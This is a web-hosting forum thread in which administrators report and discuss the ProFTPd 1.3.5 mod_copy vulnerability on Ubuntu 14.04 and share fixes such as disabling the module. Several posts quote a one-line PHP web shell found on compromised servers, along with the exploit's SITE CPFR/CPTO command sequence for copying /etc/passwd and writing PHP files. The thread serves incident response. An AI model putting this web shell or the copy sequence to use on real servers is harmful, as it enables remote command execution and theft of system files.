Secuirty issue - ProFTPd 1.3.5

10 posts / 0 new
Last post
#1 Sat, 11/28/2015 - 12:14
lookwhostalkin

Secuirty issue - ProFTPd 1.3.5

Hi,

Upon a routine look over my virtualmin box I noticed something very unnerving. Within /tmp sat a file called passwd.copy. Looking into this file I could see it was a copy of mu /etc/passwd file.

The file was owned by proftpd and created earlier today:

root@cp:~# stat /tmp/passwd.copy File: ‘/tmp/passwd.copy’ Size: 2776 Blocks: 8 IO Block: 4096 regular file Device: 13h/19d Inode: 133879265 Links: 1 Access: (0644/-rw-r--r--) Uid: ( 112/ proftpd) Gid: (65534/ nogroup) Access: 2015-11-28 12:42:38.059295568 +0000 Modify: 2015-11-28 12:42:38.059295568 +0000 Change: 2015-11-28 12:42:38.059295568 +0000

Looking into this further I can see it seems to be related to the following exploit:

https://www.exploit-db.com/exploits/36742/

root@cp:~# proftpd -v ProFTPD Version 1.3.5rc3

People running Ubuntu could be effected by this. I would recommend people check there system.

Mon, 11/30/2015 - 10:26
andreychek

Howdy,

That is indeed concerning!

Did you discover is that problem is fixed in recent Ubuntu ProFTPd packages?

It sounds like one way to be sure is to disable the mod_copy FTP module.

-Eric

Mon, 11/30/2015 - 11:07
lookwhostalkin

Hi Eric,

I am running the most recent version of ProFTPd for my Ubuntu install. Which seems to be pretty dated considering.

I will admit I didn't spend too much time on it, I noticed this issue while getting ready to pack up and leave work for the day. So I simply found the cause of the issue, checked over the system as a whole and didn't find any further issues before disabling ProFTPd and ensured it wouldn't auto start.

My "weekend" is spent with the Wife and kids so I haven't touched on this any further as of yet.

I just wanted to get this put out there for anyone else using virtualmin and Ubuntu.

Sat, 12/05/2015 - 05:12
cognosco

My CSF send me a message that there was a suspicious file in the /tmp directory. The owner was proftpd.

So I did some research and it seems that proftpd is vulnerable. Users could copy files through the system without logging in... I disabled proftpd and closed the ftp ports.

I am shocked. I am running Ubuntu 14.04, with automatic security upgrades. Also I ran updates and upgrades almost weekly, so the system should be update. But the most update proftpd package in Ubuntu 14.04 is the insucure dangerous version!! I thought my system would be safe on an up to date Ubuntu 14.04 LTS. Well, I was wrong.

This is the alert I received: Time: Fri Dec 4 10:05:39 2015 +0100 File: /tmp/.

<?php
 eval($_REQUEST[cmd]); echo GOOD;
?>

Reason: Suspicious file name Owner: proftpd:nogroup (112:65534) Action: No action taken

I could not find the file, or find other traces. I am not sure if this was logged test, without creating files or damage, or that it is really exploited. I hope someone can give more information.

Sat, 12/05/2015 - 08:50
lookwhostalkin

"This is the alert I received: Time: Fri Dec 4 10:05:39 2015 +0100 File: /tmp/.

<?php
 eval($_REQUEST[cmd]); echo GOOD;
?>

Reason: Suspicious file name Owner: proftpd:nogroup (112:65534) Action: No action taken"

I would look at doing a search on your system for .php files and check them for the content " echo GOOD".

https://www.exploit-db.com/exploits/36742/

"------------------------------ site cpfr /etc/passwd 350 File or directory exists, ready for destination name site cpto

<?php
 phpinfo();
?>

550 cpto: Permission denied site cpfr /proc/self/fd/3 350 File or directory exists, ready for destination name site cpto /var/www/test.php

test.php now contains

2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q (slon-P5Q.lan[192.168.3.193]): error rewinding scoreboard: Invalid argument 2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q (slon-P5Q.lan[192.168.3.193]): FTP session opened. 2015-04-04 02:01:27,943 slon-P5Q proftpd[16255] slon-P5Q (slon-P5Q.lan[192.168.3.193]): error opening destination file '/

<?php
phpinfo();
?>

' for copying: Permission denied

test.php contains contain correct php script "

<?php
 phpinfo();
?>

" which can be run by the php interpreter"

The exploit provided within my opening post would suggest that was part of the process they go through when creating a new .php file is created.

"I am shocked. I am running Ubuntu 14.04, with automatic security upgrades. Also I ran updates and upgrades almost weekly, so the system should be update. But the most update proftpd package in Ubuntu 14.04 is the insucure dangerous version!! I thought my system would be safe on an up to date Ubuntu 14.04 LTS. Well, I was wrong."

Its possible you could find a ppa repo with the latest version of proftpd, however, I have just opted to keep my FTP service disabled.

Tue, 12/08/2015 - 02:33
Welshman
Welshman's picture

Any more info on this. Seems one of my Ubuntu 14.04 machines has it.

The /.

<?php
 eval($_REQUEST[cmd]); echo GOOD;
?>

is a hidden file in the /tmp along with passwd.copy

Chaos Reigns Within, Reflect, Repent and Reboot, Order Shall Return.

Tue, 12/08/2015 - 11:40
lookwhostalkin

Hi Welshman,

I personally have left my FTP service disabled and closed the port off. I am using SCP to move my files to / from the server. FTP access was only ever used by developers who I didn't trust with SCP / SSH access.

I have had a quick look around and been unable to find a PPA with the latest version of proFTPD. I haven't spent that much time on it as I don't need to worry about it to tell the truth.

You may wish to experiment with compiling the latest version yourself, HOWEVER, if you intend to do that I would create a server backup for disaster recover reasons.

If I get bored and the time I may try this myself before the week is out and compile a .deb file if it goes well. I will then update this post. Please keep in mind I make no promises and if I do get around to it I would always recommend being careful of downloading .deb's from unknown / untrusted sources.

Tue, 12/08/2015 - 12:08
Welshman
Welshman's picture

Disabling ftp is not an option for me as clients need access, what I did was comment out the module in question ... mod_copy.c restarted the service. Even rebooted, I do not think I deleted the 2 odd files but they seemed to go away? Sorry not an expert here but this is a worrying exploit indeed, why do they not fix it?

Thanks.

Chaos Reigns Within, Reflect, Repent and Reboot, Order Shall Return.

Tue, 12/08/2015 - 12:13
lookwhostalkin

Hi Welshman,

Its possible your system deleted the files within /tmp upon reboot. If you have disabled the module which is the cause of the exploit you should be fine for the moment.

As for why they didn't fix it, I am sure they did with the latest version. It just seems this versions hasn't been passed into the repo for Ubuntu 14.04.

Please be aware this is an OS/Ubunut issue, not a virtualmin issue

Tue, 12/08/2015 - 12:49
Welshman
Welshman's picture

IRC ubuntu-server

Response :)

protftp is community maintained; I think no one actually uses it, since no one has prepared updates yet.

???

Another response...

feel free to run vsftpd, which is in main and supported by the ubuntu security team

???

I sometimes wonder if anyone cares!

Chaos Reigns Within, Reflect, Repent and Reboot, Order Shall Return.